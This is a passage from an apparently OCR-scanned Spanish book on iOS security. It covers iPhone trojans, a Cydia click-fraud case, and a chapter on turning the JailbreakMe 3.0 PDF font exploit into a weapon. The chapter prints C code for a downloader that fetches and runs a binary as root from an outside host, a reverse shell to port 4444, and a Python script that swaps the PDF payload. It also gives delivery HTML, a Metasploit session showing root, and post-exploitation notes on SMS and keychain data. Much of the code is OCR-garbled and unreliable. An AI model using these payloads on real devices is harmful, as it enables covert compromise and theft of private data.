El número de troyanos creados para instalar en dispositivos que dispongan de terminales con 
Jailbreak es considerable. FlexiSpy es otro de los troyanos que ofrece múltiples funcionalidades, 
que con mayor o menor aproximación son las mismas que se han mencionado en los casos anteriores 
expuestos. 
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Sin embargo, no solo hay herramientas para troyanizar sistemas, y aplicaciones de forense profesional 
como Oxygen Forensic tienen módulos especiales para detectar este tipo de software malicioso 
instalado en el terminal. 
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Imagen'07.57: Ovigen Forensic detecta spyware y malware en los terminales iPhone. 


Malware a través de Cydia: Un caso de Click Fraud 


Al igual que en el caso de InsraStock, donde Charlie Miller demostraba cómo era posible hacer un 
malware y distribuirlo por la App Store, este caso de Click Fraud descubierto por un investigador 
español, demuestra que también se puede crear una aplicación dropper en Cydia que consiga engañar 
a usuarios para troyanizar sus sistemas. 


El caso de Eagle, que asi se apoda el protagonista de esta historia, es que se dio cuenta de que su 
tarifa de datos se estaba consumiendo de manera alarmante, por el tipico mensaje del operador, 
algo que pudo contrastar por sí mismo con la herramienta Data Monitor, tal y como se aprecia en la 
siguiente captura: 
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Para descubrir la aplicación causante de este alarmante consumo hizo pasar cl tráfico por un equipo 
por Wireshark, usando de un ataque man in the middie con Lttercap entre su terminal ¡Phone y el 
router Wi-Fi de casa, para descubrir que se realizaban muchas peticiones a sitios web extraños. 


Imagen 07.59: Sitios web visitados automáticamente. 
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Tras analizar en detalle una de las URLs, descubrió que una de ellas llevaba en un parámetro GET 
el nombre de un usuario: Nobitazzz, creador de 9 aplicaciones en Cydia, entre otras, ¡OS 6 Photos 
Memu, que es la que había descargado el usuario que sufrió el protagonista de esta historia. 


mast: prpdever- nero 
16: Mozílla/3.0 (lrhore; cru iPhone os 5,11 like wac os X) Applemebrit/524.46 Qarwi, Jike secko) mobi1e/9m2064r4n| 
ext /heml „appi icar ton/xhrmi san app H car ion/xm;q=0. 9,*/*59-0. 21 un 
prp refamobitazzzta) lego 


herp: //ptotever ner /banntere. 
Accept-Language: es-es\r\n 
Accepr-encodíng: g2tp, def iate\rin 
Comnecttont keep-alive\r\n 
Srn 


Imagen 07.60: URL con referencia al usuario Nobitazzz, 


Este usuario Nobitazzz estaba haciendo peticiones a anuncios publicitarios, realizando un Click Fraud 
a las compañías de publicidad, en las que se podía consultar el dinero ganado hasta el momento por 
este usuario en una de ellas. Cuesta imaginar lo que llevaría en total ganado en todas ellas, motivo 
por el cual el mundo del fraude online es tan rentable, 


Imagen 07.61: Dincro ganado por Nobítazzz en una de las URLs. 


A día de hoy, Saurik, creador de Cydia, está avisado y ha tomado medidas contra este usuario que 
ha prometido no realizar dicha acción más, pero la situación deja de manifiesto la necesidad de 
confiar en las medidas de seguridad que las tiendas de aplicaciones toman sobre las aplicaciones 
que ofrecen. 


Conclusión 


Al final, ya sea mediante una app a través de la App Store que salte los controles y contenga funciones 
dormidas, a través de la realización de un ataque basado en un provisioning profile a un terminal 
sin Jailbreak. mediante la realización de un Jailbreak o haciendo uso de Cydia y terminales que 
ya tengan Jailbreak, es posible encontrar formas de introducir un software malicioso que controle 
remotamente un terminal ¿Phone o iPad. 
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Capítulo VIII 
JailOwnMe 


1. Introducción 


El sistema operativo ¡OS de Apple es. probablemente, uno de los más seguros debido a la gran 
cantidad de controles de seguridad que se incorporan por defecto y que además no pueden ser 
desactivados por el usuario. Sin embargo, el número de bugs que se descubren día a día en ¡OS es 
muy alto, y basta con echar un ojo a las estadisticas para darse cuenta de que podrían desarrollarse 
muchos exploits con ellos, con la paciencia y los conocimientos adecuados, 


Vulnerabilities By Year Vulnerabilities By Type 
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Imagen 08.01; Estadisticas de bugs en iOS recogidas en expedientes CVE. 


La mayoría de dichos bugs no son públicos, quizá debido a la gran cantidad de dinero que se está 
pagando por ellos y a la complejidad de desarrollarlos, que según la revista Forbes es de los más 
caros. 


Por desgracia, la seguridad frecuentemente es inversamente proporcional a la usabilidad, con lo 
que paralelamente a la aparición de ¡OS ha surgido la comunidad de .Jailbreakers, que desarrollan 
modificaciones sobre el sistema operativo original que les permita ejecutar sofware no firmado por 
Apple o poder acceder de forma completa a los directorios del dispositivo. 


En un ¡OS, todo el software se encuentra firmado por Apple, desde la BootRom hasta el propio kernel 
del sistema operativo, y por supuesto las aplicaciones. Como consecuencia, no se puede modificar 
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el kernel de ninguna manera, ya que la firma sería erronea y este nunca sería ejecutado, Para ello, la 
comunidad de Jailbreakers se ha lanzado a la búsqueda de vulnerabilidades que les permitan obtener 
el control suficiente como para modificar el proceso de arranque (llamado Secure Boot Chain por 
Apple) y poder ejecutar un kerne! modificado o cualquier otra cosa. 


Para un pentester, cl “cualquier otra cosa” que se pude realizar con un exploit que es utilizado en las 
herramientas de Jailbreak es lo más interesante, ya que se pueden usar las mismas vulnerabilidades 
utilizadas para hacer Jailbreak, pero para comprometer un dispositivo y obtener acceso a su 
información. Si estos son remotos, como los que se usaron en Jailbreak 2.0 y JailhreakMe 3.0 mejor 
que mejor. De esto trata este capílulo, de cómo se puede sacar provecho de un exploit utilizado cn 
JailbreakMe para adaptarlo a nuestras necesidades. 


2.JailbreakMe 3.0 


Comex es, sin duda, uno de los hackers de ¡OS más conocidos de la scene, De sus manos han salido 
diversos métodos que ha ido publicando en su web htp:/4wwnw.JailbreakMe.com/. El más reciente 
de ellos, llamado JailbreakMe 3.0, surgió tras la aparición del ¿Pad 2, momento en el cual no existía 
ninguna manera de hacer Jailbreak a estos dispositivos, ya que el exploit limeraln (descubierto por 
Geohot, otro de los grandes de la scene), que era el utilizado hasta este momento, aprovechaba una 
vulnerabilidad en la BootRom, y esta había sido actualizada en los nuevos dispositivos. Este nuevo 
método, además, funcionaba en la versión 4.3.x (hasta la 4.3.3), en la que Apple habia i entado 


la segu di silivo añadiendo nuevas medidas de seguridad coma 
A pesar de cso, Comex consiguió encontrar una vulnerabilidad con la que 
era posible hacer Jailbreak de los dispositivos con tan solo visitar su web y pulsar en un botón, algo 


que fascinó a todos los usuarios de OS. 


Imagen 08.02: .JarlbrekMe 3.0 en Cydia. 
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Como suele ocurrir, hay avances que fascinan a unos y asustan a otros. Era evidente que si Comex era 
capaz de hacer Jailbreak de los dispositivos con tan solo visitar una web era porque el MohileSafari 
© alguno de sus complementos tenia alguna vulnerabilidad que él utilizaba para ejecutar código y, a 
partir de ahí, realizar el Jailbreak. Sabiendo esto... ¿qué impediría a un atacante utilizar esta misma 
vulnerabilidad para tomar el control de los dispositivos? 


En un principio, el desconocimiento de la vulnerabilidad era lo único que impedía su uso para 
otros propósitos, ya que los detalles sobre esta no serían publicados hasta tiempo después. Más 


tarde, Comex publicaría inclu npleaba para explotar la vulncrabilidad en su 
repositorio de github 


En cualquier caso, investigar una vulnerabilidad a partir de un exploit 0-day no documentado es 
una tarea muy habitual en los equipos de seguridad de las principales empresas de desarrollo de 
software y sistemas. Como es bien sabido, gran parte de los parches de seguridad que publican los 
fabricantes de sistemas operativos son obtenidos tras haber sido explotados por algún atacante o 
malware mediante un exploit 0-day. 'Iras realizar la ingeniería inversa de estos exploits, se descubre 
la vulnerabilidad que propició la explotación, y a partir de esta información estudian la mejor manera 
de corregirlo y se desarrolla el parche. 


3. Obteniendo el exploit 


Como ya se ha mencionado, en un principio el código fuente del exploit utilizado por Comex no fue 
publicado, pero eso no quiere decir que no se pudiera averiguar en que consistia, Visitando la web 
http://www. JailbreakMe.com/ desde un equipo de usuario, se recibía um mensaje que decía “Come 
back on your iPhone, ¡Pad or iPad Touch to use JailbreakMe”. Era evidente que la aplicación 
web realiza un reconocimiento del dispositivo que la visitaba utilizando el User-Agent, que en el 
caso de los sistemas ¡OS es extremadamenle representativo, ya que contiene la versión exacta del 
sistema operativo. Esta información, al igual que hacen los exploit-kits, era utilizada para redirigir al 
dispositivo el exploit adecuado para su versión, y de esta manera realizar el Jailbreak. 


9 Show/hide hackbar 
2 Default User Agen: EN y Default User Agent 
Desarrollador web 
FoxyProxy Standard 

Información de la página 


Iniciar navegación privada 
Limpiar el historial reciente... 


User Agent Switcher 
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Al visitar la página empleando el User-Agent adecuado, esta muestra un botón que, al ser pulsado, 
redirige al navegador a un fichero PDF especialmente construido para la versión de ¡OS cuyo User- 
Agent se esté usurpando. Ninguna acción posterior es realizada, por lo que este PDF debia contener 
la explotación de la vulnerabilidad. 


E i 


Los PDFs, al intentar visualizarlos mediante cualquier visor, contenían una única letra (@). 
Posteriormente se sabría que la vulnerabilidad se encuentra en el procesado del formato de la fuente, 
por lo que visualizar una letra que emplee la fuente maliciosa era más que suficiente para explotar 
la vulnerabilidad. En otras situaciones, un atacante podría haber embebido esta fuente en cualquier 
letra de un documento legítimo con el fin de que el usuario no se percatara del engaño. Este PDF, 
además, podria ser enviado por diferentes medios (enlaces, correo, etc) e ir comprometiendo a 
diferentes dispositivos. 


Imagen 08.04: El documento PDF con solo una arroba. 


Una vez obtenido el exploit. el análisis del mismo consistió en el análisis de un PDF, como si de un 
análisis de malware se tratara. 


4. Análisis del exploit 


En muchas ocasiones no es estrictamente necesario entender el funcionamiento de un exploit para 
poder alterar su payload y conseguir que realice las acciones que se deseen, pero ello siempre 
contribuye a aumentar el conocimiento, así que es un ejercicio muy recomendable. 


En este caso, el JailbreakMe 3.0 explota dos vulnerabilidades diferentes de forma consecutiva. La 
primera de ellas fue etiquetada con el identificador CVE-2011-0226 y consistía en un error en la 
comprobación de un entero dentro de la función ca/lorhersubr de Truerype, lo cual permitía cambiar 
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el puntero de pila (stack pointer) a cualquier dirceción arbitraria. ista dirección “arbitraria” contenía 
un exploit, codificado completamente en ROP (Rerurn-Oriented Programming) que explotaba una 
segunda vulnerabilidad. 


Owverflowed Stack 


Call Frame 


Gadget Variables 


PAP ILOGUTIS. 


La segunda vulnerabilidad explotada, etiquetada como CVE-2011-0227, consistía en un error en la 
conversión de tipos cn /O Mobile rameBuffer que permitia la ejecución de código no firmado en el 

lisposilivo. Conseguir explotar este tipo de vulnerabilidades es muy importante en la explotación 
sistemas ¡OS, ya que en caso contrario es necesario codificar todos los shelleodes completamente 
ROP, lo cual puede llugar a ser extremadamente complejo. A partir de la explotación de esta 
Incrabilidad, el exploit ejecuta un shellcode “tradicional” (no-ROP) que realiza un parcheo del 
nel en memoria que le permitirá ejecutar código sin firmar. Otra de las modificaciones importantes 
ie realiza el exploit sobre el kernel es crear un manejador para la syscall 0, de tal modo que 
¡quier aplicación que realice esta llamada escala automáticamente a privilegios de root. 


cve CVE-2011-0226 — CVE-2011-0227 
Producto FreeType < 2.4.6 105 
E 105 <42.9 105<4.2.9 
o | OSAA 105<434 
Vulnermbitidad | Comprobación de teo lá de tipos errónea. 

errónea. 

PT EN Ejecución de aplicaciones no 

Impacto | Ejecución de Código Badas 


Tabla 08.01: Tabla de versiones afectadas 
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Una vez hechas estas modificaciones, descomprime el contenido de una aplicación de ¡OS que 
se encuentra dentro del propio PDF, guarda su contenido en /tmp/locutus, y ejecuta este, que es 
realmente el que realiza todo el proceso de Jailbreak, bajándose diferentes ficheros del la web http:// 
www.JailbrealMe.com que realizarán las modificaciones permanentes del kernel, la reorganización 
de ficheros y permisos en el sistema de ficheros, y la instalación de Cydia, entre otras acciones. 


Un análisis muy completo y detallado fue realizado por el equipo de Sogeti ESEC Lab, el cual se 
recomienda para ampliar información a este respecto: htip://esec-lab.sogeti.com/post/Analysis-of- 
the-JailbreakMe-v3-font-exploit. 


5.Se busca payload 


En realidad, tal y como se comentaba anteriormente, muchas veces es posible localizar el payload 
del exploit sin necesidad de comprender todos y cada uno de los pasos que este sigue, En este caso, 
resultaba sencillo localizar el cuerpo del binario locutus, y por lo tanto cambiarlo por otro diferente 
que ejecute las acciones que se descen. 


Si se edita el documento PDF que se ha obtenido (con ví, por ejemplo), se verán los diferentes 
streams y objetos de los que está compuesto. De entre todos, uno de ellos contiene visiblemente 
mucha más información del resto, aunque esta es ble puesto que se encuentra comprimida. 
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Imogen 08.06: El payload del pi 


Al descomprimir este stream se aprecia que se trata de un PFB (PostScript Type 1) que contiene la 
descripción de la fuente malformada y. presumiblemente, el contenido del binario que es ejecutado 
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por el exploit. Además, Comex ha dejado una sorpresita llamada TerminalFun. El TerminalFun es 
simplemente una sucesión de caracteres que, al menos en un Mac OS X, hace que el terminal donde 
se lanzan empiece a minimizarse y maximizarse durante un largo rato. No tiene ninguna relevancia 
ni utilidad para la explotación, pero es bastante molesto en caso de que se haga un cat de este 
contenido. 


(/BlendbesigrPositiors [LS €J] def 
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/8lendaxisTypes [/A /B] def 
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Imagen 08.07: El payload descomprimido. 


Además de esta broma de Comex, es posible encontrar otro objeto (dup 0 12524). también 
comprimido, del que se puede apreciar que también tiene un tamaño considerable. Si se descomprime 
se observará que se trata de un binario Mach-O para procesador ARM, que es exactamente el tipo 
de binarios que ejecula un ¿OS. 
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TA _SyrDOLStUDA_TEXT??97_DATAS'O0_LazY_Synbol_DATAOS_ 
prograr_vars_DATI_Nl_synbo"_ptr_DATAML?_d3ta_DATAPA?:PL_cfstring_DATAE| 78,_b55_DATA ~, 8_ 11 
RECTTO rta WNE?) 


4? 
JUST IADIAY UCI 82m. 12": 
Orusr/l4b/“4b7.1.dy lib 
1:62/Systen/Llora 


ry/Fraremorks/Corercundatian. “ramexork/Corer oundation 
?/Sy5tem/LibrarysFremenorks/Crietuork. framework /CHetunrk 
114, ZsystemLibrary/+raneworks/roungation. Tra 


Tewe rk Fnuneat ion 


4?1u5"/11b/libgcc_5.1.dy 110 
47/usrlib/libsysten,B.dylib 7p? 
EEUU P SOME RUYUNC Ida dea rrarrtcie 
Praman 
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Al analizar lo que hace este binario se observa que se trata del binario /ocurms ya mencionado 
anteriormente, ya que realiza una serie de conexiones a la web de .JailbreakMe v3.0 y se descarga 
los ficheros mencionados anteriormente, 


Sin embargo, los pemtesters no quieren realizar un Jailbreak permanente del dispositivo ni instalar 
Cydia, sino que simplemente pretenden tomar el control del dispositivo. Según se ha comentado 
anteriormente, el exploit ejecutará este fichero una vez parcheado el kernel adecuadamente para 
ejecutar aplicaciones sin firmar, desactivada la sundbox y el resto de medidas de seguridad, por lo 
que es el momento idóneo para ejecutar el payload cn lugar del original. 


Por lo tanto, si se es capaz de analizar y encontrar este binario, solo hay que cambiarlo por uno de 
elección propia para obtener el control del dispositivo con tan solo conseguir que visiten un enlace 
controlado por el atacante. Pero... ¿Qué se desesa que ejecute? 


6. Payloads para iOS 


Lamentablemente no es sencillo encontrar shells inversas ni otro tipo de pavloads similares para iOS, 
ya que sus protecciones obligan a que cualquier payload lenga que ser implementado en fidI-ROP, 
con lo que no se ha desarrollado una gran variedad de payloads como sucede con olros sistemas 
como Windows o UNIX. Por suerte, gracias al segundo exploit utilizado por Comex, es posible 
desarrollar una aplicación que realice las acciones que se descen sin tener que preocuparse por la 
comprobación de la firma. 


Ln este caso, para evitar tencr que reconstruir el PDF para cada payload diferente que se quiera 
probar, se crearia una aplicación que descarga olro binario de una web, al mås puro estilo de la 
conocida herramienta wget. El código, basado en wget_sortof.c de Vyacheslav Goltser, descarga un 
nuevo binario de la URI, hr1p://exploit.pentester.es/payload. bin y lo guarda en /tmp/pwn.me, para 
luego ejecutarlo con privilegios de »vof. De esta forma es posible cambiar el binario payload.bin en 
el servidor web para cambiar el comportamiento que se desee de los sistemas comprometidos. 


t_sortof.c (Vyauhc: 


lav boltser <slavikgfgmail.com>) 


Include 
tinclude <sys/sock 
Hincludo <nolinet/in.h> 
lincince 
tinclude 
tincluce 
dinalude 


Hdefine HOS: 
define PORT £0 

#define ZST “GET /payload.bir HITP/1.CinAn” 
define MD */Lmo/pan.ne” 

ddofine MAXARRAY 150000 


antester.es” 
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ino maintint argc, char **arqv) 


f 
11 Zomect to kvi Sen 
struct sockaddr in servadar; 
streel hostenz "hp? 
int sosk_id; 
har message [MAXARRAY] ; 
in. msglen; 
char requeszI] = REQUEST; 
sock_id = socket(AF_INET, SOCX_STREAM, 0); 
mamas. (Sservaddr, 0, sizeof (servaddr)); 
hp = gethcs=hyname (HOSTNAME) ; 

Ícpy((char *) £servaddr.sin_addr.s + (char *)Ep->h_addr, hp-=>h_length); 
servaddr.sin port = htons(20RT); 
servaddr.sin_family = AF INET; 
connec= (sock_3d, (strus. sockaddr *)a: of (servaðdr) ); 
v nd Request & Receive Response 
write (scex_id,remucst,slrien(request)}; 
mscler = read(sock_id,nessage, MAXARRAY) ; 
// Open File Handler 
FILE + pFile; 
prile fopení PAYLOAD, “wb” ); 

/ Ignore ITT? leaders 
har * 

t catler; 

ntent = strstr (message, ”\r\n\ry\n 
content ~ átuonleat[4]); 
cnzlen = msglen + (int) (message) - (int) (content); 
ff Write First Packets 
fwrite (conzenz , 2 , enller, pFile ); 

// Writs All Other Packets 
road (uuex_id, message, MAXARRAY) ; 
magler != 0) 
t 
Lwrite (message, 1 , msglen , prile ); 
msglen - read(sock_id, message, MAXARRAY) ; 
} 
// Close Hardler 
close ( sock_id ); 
-c-osel pFile ); 
// Execute Fil. 
vhiod( PAYLOAD, stztol("0755",0,8) )7 
syanal1(0); // Give me the power!! 
execvp( FAYLOAD, NULI) 
n 0 
+ 
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Tal y como se ha comentado con anterioridad, el payload debe realizar una llamada a syscall(0) para 
elevar privilegios a rooz, gracias al manejador introducido por las etapas anteriores del exploit. En 
caso de no hacerlo, el binario sería ejecutado con los privilegios del usuario mobile. 


Cuando se realicen este tipo de trabajos, una recomendación es partir de payloads lo más sencillos 
posibles y, una vez comprobado su correcto funcionamiento, ir aumentando su funcionalidad 
progresivamente hasta que realice las acciones deseadas. En este caso se podría comenzar por 
crear una aplicación que escriba un fichero en un directorio temporal, y acabar por lanza una shell 
inversa al puerto 4444 del host exploit. pentester.es, donde se podría tener a la escucha un nercar o 
Metasploit. 

include <stdio. k> 

tinclude <sys/types.h> 

tinclude <sys/socket.h> 

tinclude <nezinet/in.h> 

+include <netub.h> 

+include <stdlib.h> 

linelude <string.h> 

dinclude <unistd.h> 


Ícletina HOSTNAME “exploit.pentester.e 
Ádefine PORT 4044 


Adeline MAXARRAY 150000 


int main(int arge, char **argv) 
1 
// Connect to Evil Server 
struct sonkaddr_in servadd 
struct hostent "hp; 
int sock_id; 
char message [MAXARRAY] ; 
int msglen; 
sock_id = socket (AF_INET, SOUK_STREAM, 0); 
memset. (4servadde, 0, sizeof (servaddr) ); 
hp = gethostbyname (FOSTNAME) ; 
memcpy ( (char *)6servaddr.sin_addr.s_addr, (char *)hp->h_addr, hp->h_ 
servaddr.sin_port = hzons (PORT) ; 
servaddr.sin_family = AF_INET; 
connect (sock_id, (struct sockaddr *)§servad 


// Descriptors to Saskel 
4i setsid(); 
dup2{ sock_id, 0 ); 
dup2( sock_id, 1 ); 
dup2i sock id, 2 ); 


// Execute Shell 
execl( "/bin/bash”, “/bin. 


+ NULL ); 


// Close Handler 
close( sock id ); 


a 
3 
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Para lanzar una shell inversa, una forma sencilla consiste en crear la conexión y duplicar los 
descriptores de entrada y salida estándar, y salida de error al socker, para posteriormente lanzar una 
shell. Esto hace que la información recibida por el socket sea transmitida a la shell, y que la respuesta 
de esta sea a su vez enviada por el socket, con lo que se tendrá una skell inversa cn toda regla. 


Listos y otros payloads pueden ser descargados de: /11p://ools.pentester:es/JailOwnMe para más 
información, En la actualidad también pueden encontrarse payloads para ¡OS en Metasploit (osx/ 
armle/shell_reverse_tcp), aunque se ha probado JailOwnMe con ellos. 


7. Resultado final 


Ahora que se conoce en que parte del PDI se guarda el payload y que ya se dispone de un payload 
alternativo que utilizar, solo quedaría hacer la substitución para generar un nuevo PDF un poco más 
malicioso que el original. Para ello se desarrolló un scripr en Python que extrae la información de 
los streams y objetos hasta llegar al payload, para luego sustituirlo por el nuevo y realizar el proceso 
inverso hasta construir un nuevo PDF. 

H/asr/bin/python 

inper zlib, sys, re, struel 


I Diselainse 

print ‘This information is for avadomic purposes cnly! This info is 
nst to be abused! nsible for any damage that you may exvate!” 
print ‘Jose Solvi - jselvilpentester.es’ 


print = sys.arqv[0] + ` <Comcx_ PDF 
put.pdf>' 
exito 


ploit.páž> <New Payload.bin> <Cut- 


print ‘Input PDI 
pront MTepur 
print “Output PDF 


sys.argv12] - 
` + sys.arow(3) 


| Rean PDF Exploit 
paf = openísys.arar[l], “rb ).resd() 


+ Search encoded stream 

al - research ('\ratreamyno’, 
= ml.ens) 
search ('\nenċstrean\n’, pdfistream begin:]) 
straar_end — m2.start() + slreum begin 


dt} 


# split EDF content 

odf bezore stream = pdf’ :stream begin- ] 

pdf encoded sirvan — pdf[str=sam_hegin:stream erd] 
pdr_after_stream = paf [strean_endi1:] 


# Decode Stream 
plo — zlib. decompress ( pdf_erccded stream ) 


# Search dap J Llue 
ml — re.searca('in 
dup_begin = ml .end() 
m2 = re.search('indup | *, pb) 
dap, - n2.start () 


jubrs 20-9]- arz 


in', pfb) 


+ sp Content 
plb_velowe_dap0 — psb[:dup_begin-1] 
pfh_eupl = p£b[dup begin:dup end] 
p£b after_dupt = pibldup_end+ :] 


# Get Lenghz and encoded file 

ml = re.sesrch('dup Ò [0-9]+ x `, pfb 
ile_begin — Zen (ml.group (0)} 

äle end = len(pfb dupt) -4 


t Save origiral birary 
_oldbiín = p£b dup0 [äle begia 
z oldbin_len = len( z_o-dbin ) 


4 Raad new payload 

rewbin = open (uy: w[2], *rb').rszad() 
renbin_encoded = zlib.compress( newbic, 5) 
rewbin len = lení newbir encoded ) 
nexbin_encosed = rewbia_eacaded + “x00/* (z_oldb: 
neabir_len — len( newbir_encoded ) 


4 ate Dup Y string 
plo depd — ‘dup 2 ` + str(newbin len) I ' x * + rewbin encoded + * pul” 


4 Create New PFB 
pib - pfb_hefare_dup0 + “a” + pfo dep) | "in! + pfb_a 


uo 


+ Compress PFB ard T e Now PDF 

l oncaded_stream — zlib.compress[ pfo, 9 ) 
påf — pdf before stream  'in' 1 pdt d_strean + '\r’ + pdf after stream 
open(sys.argv[3], 'wb').wrile (pal) 


neoc 


Como se puede apreciar, es necesario que el payload introducido sea del mismo tamaño que el 
original, para que el exploit resulte ser funcional. En muchos casos, los exploits cuentan con que 
el payload empleado tiene un tamaño concreto, por lo que no mantenerlo igual puede provocar 
problemas en su ejecución. En este caso, se ha añadido el carácler NULL tras el nuevo payload 
tantas veces como scan necesarias para que este ocupe el mismo espacio que el payload original. 
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Los payloads, por su parte, sc pueden compilar con cualquier compilador cruzado que permita 
construir aplicaciones para ¡OS. En el caso de gec en Mac OS X, es posible compilarlos de la 
siguiente forma: 


$ ace -L/D /iDhone0S.platf£orm/Developer/3! Pi sdx/usr/ 
lib -1/Deve La Phon > sdk/usr/ 
include -arch armv7 mthumo payload_wgez.c -o payload, 


-2.sdx/usr/ 
«sdk/usr/ 


$ gce -L/Developer/2Larforns/ i Vh 
lib -1/Develcper/PLat=orms/1Phone03 «plat£o! levalopao EUIS 
inelude -arch armv? -mlkuno payload_reversetcp.c -o payload rev 


205. 


El binario payload _reversetcp se publicaria en http. //exploit.pentester.es/paylvad.bin de tal forma 
que pueda ser descargado por el binario payload wget, que será el que se introducirá en el PDF 
mediante el seript en Python, de la siguiente forma: 


y ¿Pad 4.3 


B. 


$ ./20SExploit sdf payload_wgel oxp oit.put 


El nuevo PDF también se publicaría en hrrp:/exploit.pentester.es/exploit.pdf y ya tan solo quedaria 
preparar un index.html que, al ser visitado, cargue el PDF del exploit. Lo ideal para una explotación 
lo más satisfactoria posible sería hacer un reconocimiento de User-Agent, al igual que realizaba 
el JailbreakMe 3.0, y proporcionar a la víctima el exploit indicado para su versión de ¡OS. Sin 
embargo, como prueba de concepto, se puede asumir que se conoce a priori la versión que se quiere 
explotar, con lo que el HTML necesario podría ser tan sencillo como sigue: 

Es ANZD!</h1> 

1) e/h2></p> 
><br cbrach rabo 
<brocbr><bro<bro<br 


<p><n2>But shkht 
<or><br>«<br><o: 
>»<br><br><o; 
<br><hr: 


r> 
><br><br> 


<tr><br: Skbr>xbr><br>cbr>sbr> <br><br> 
<br><br><brə<or><sbr><ory<sbr><hr> <n ><br ghi ><br» 
<Er><br><br><or><br> <or><bro<br><or><bro<br><b 


<iframe src-“explolL.pul”></iframe> 
<foody></html> 


En estos momentos ya está todo preparado para tomar el control de cualquier dispositivo ¿OS con 
versión igual o inferior a 4.3.3. Solo hay que poner un netcaí o Metasploit a la escucha cn cl puerto 
4444, Si se desea emplear Metasploit, es imporlante recordar que payload UNIX/shell/reverse_tcp 
no es un payload normal, sino staged. Esto quiere decir que, al recibir una conexión, se envía el 
stage shell para que sea ejecutado, y esto no es lo que va a esperar el payload que se ha creado. Para 
poner Metasploit a la escucha de un payload no-staged es necesario utilizar el tipo adecuado de 
payload. En este caso se trataría del payload generic/shell reverse tcp, que simplemente se pondría 
a la escucha y actuaria como un zetcat: 


nsf 
ns 
nsë exploit(handler 
msf exploit (han 


et LHCST C.D.0.C 


r 
> set PAYLOAD q=nerir, 
> a 
> oxploit 
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inst exploit(handler) > exploit 


[*] Started reverse handler on 0.0.0.0:4444 
[+] starting the payload handler... 
[+] Command shell session 5 opened (192.168.1.10:4444 -> 192.168.1.5:49396) at 2011-07-28 


04:36:59 -0400 
luname -a 


ruin iPad2-de-Ankara 11.9.0 Darwin Kernel Version 11.8.8: Wed Mar 30 18:52:42 PDT 2011; 
root:Xxnu-1735.46-10/RELEASE ARM S5LB948X iPad2,2 arm K94AP Darwin 


id 
uid-a(root) gid=501(mobile) groups=501(mobile) 
Imagen 08.09: 


jecución del exploit. 


Mientras se obtiene el control del dispositivo con privilegios de rovi, el usuario no observa ninguna 
situación anómala en el interface, más que la visualización de la página web que se haya preparado, 
que en este caso da algunas pistas de que su seguridad puede haber sido comprometida, poro que 
podría no ser más que una página de noticia, un webmail de correo, o cualquier otra cosa. 


You're OWNED! 
But shhh?! 1's a seret) 


Note that 
It only exis 


This file i 
Do not edit 


mnd) 


sf exploitihal 


Imagen 08.10: Jailowned. 


Esta vulnerabilidad, como ya se ha comentado, solo afectaria a versiones de ¿OS iguales o inferiores 
a 4.3.3, pero cualquier vulnerabilidad que sc emplee para realizar un Jailbreak podría ser modificada 
de uma manera análoga para comprometer los dispositivos. 


ados para esta explotación pueden ser descargados desde: 
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8. Postexplotación en ¡OS 


Para muchos usuarios, el conseguir la skel? de roof es en si mismo un objetivo, por la complejidad 
técnica que puede llegar a tener y por lo que supone. El típico “PWNED” es la marca de que, a 
partir de ese momento, el sistema es del atacante y de que este puede hacer con él lo que quiera, Sin 
embargo, para los atacantes no es más que el principio, y es a partir de aquí donde pueden empezar a 
hacer auténticas “maldades”. Para los pentesters, es algo que deben realizar también para hacer ver 
a los clientes el riesgo real, ya que para muchos de ellos ver una almohadilla en la pantalla puede no 
significar gran cosa. 


Dicho esto, habiendo conseguido privilegios de zoot en un sistema ¡OS... ¿qué se puede hacer? 
Lo más inmediato es aplicar las mismas técnicas que se podrian usar en un análisis forense del 
dispositivo. Evidentemente, toda la privacidad de corrcos, mensajes y mensajería como pudiera ser 
Whatsapp o cualquier otro, quedaría inmediatamente comprometida, 


Los SMS, por ejemplo, son almacenados en una base de datos SOLite en cl poi mi A 
oe ml son visibles mediante cualquier visor de SQLite. Además. este fichero 
puede ser utilizado para, empleando técnicas forenses, acceder incluso al contenido de los SMS 
borrados por el usuario. Esto, además del impacto para la privacidad, puede suponer un problema 
para aquellas aplicaciones y servicios que reciben las credenciales de autenticación vía SMS, ya que 
estas podrían ser recuperadas aunque hayan sido debidamente protegidas en su almacenamiento por 
la aplicación. 


Otro tipo de información, como la asociada a credenciales, ha recibido una protección especial 
por parte de Apple a través de su funcionalidad de “Data Protection”. Según dice la propia Apple 


en su documento de seguridad de ¡OS! 
PAIPA ha intentado conseguir el equilibrio entre seguridad y usabilidad creando perfiles de 


información, de tal modo que los desarrolladores pueden elegir el que más convenga a su aplicación. 
En base a su accesibilidad. se puede decir que hay cuatro tipos de información: 
E a i La información solo estará disponible cuando el sistema se encuentra 
oqueado. Es cl tipo de protección más completa y es apropiada para aquella que no 
os necesario que sea usada cuando no hay nadie utilizando el dispositivo. Fs la usada, por 
ejemplo, para almacenar las claves de Safari o de backup de iTunes. 


EAU Soio aplica a ficheros. Está pensada para accesos que sean necesarios 
¡entras el dispositivo se encuentra bloqueado, para lo cual se generan un par de claves 
pública y privada independiente. 

AREAS > información no está disponible al arrancar el dispositivo hasta que 
se realiza el primer desbloqueo, pero permanece disponible al realizarse el resto de bloqucos. 


Este tipo de información es empleada, por ejemplo, para almacenar las claves de correo, ya 
que se desea que el disposilivo siga recibiendo correo aunque este se encuentre bloqueado. 


a información SILMPRE se encuentra disponible, independientemente del 
estado del dispositivo. 
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Ham Accessible 
Wi-Fi passwords After first unlock 

Mall accounts After first unlock 

Exchange accounts After first unlock 

VPN certifcaces Always nonmgrasoy 
VPN pisswords After first unlock 

LDAP, CallDAV, CardDAV After first unlock 

Tunes backup When unlocked, non-migratory 
Voicemail Always 

Safari passwords When unlocked Ā 
Bluetooth keys “Always, non-migratory 

Apple Push Notification Service Token Always, non-migratory 

¡Cloud cert ficates and private keys Aways. non-migratory 

il non 

Certificates and Profile] non-m 

SIM PIN “Always, ron-migratory 


Para obtener acceso a esta información para posteriormente utilizarla en ataques futuros es necesario 


disponer del UZD del dispositivo, que c: 


rente para cada uno y no es accesible por software, y el 


Passcode del usuario. En el caso de un análisis forense, el acceso físico da la posibilidad de emplear 
el UID para descifrar aunque se desconozca cual es. No obstante, el uso de esta clave de dispositivo 
hace que una información cifrada en uno de estos no sca “exportable” a otro con una mera copia del 
fichero. Lil otro factor que sería necesario conocer, en algunos casos, es el Passcode. La obtención 
de este Passcode, cuando no se dispone de él, suele ser uno de los grandes problemas en el análisis 
forense de estos dispositivos. 


Passcode Key 


M8éleprolectonNone | [nSicProtectionCompleteVatiirsaUsariuthentication | | ASProtectionCompleta 
Class Kay Ches Key Clase Key 


f 
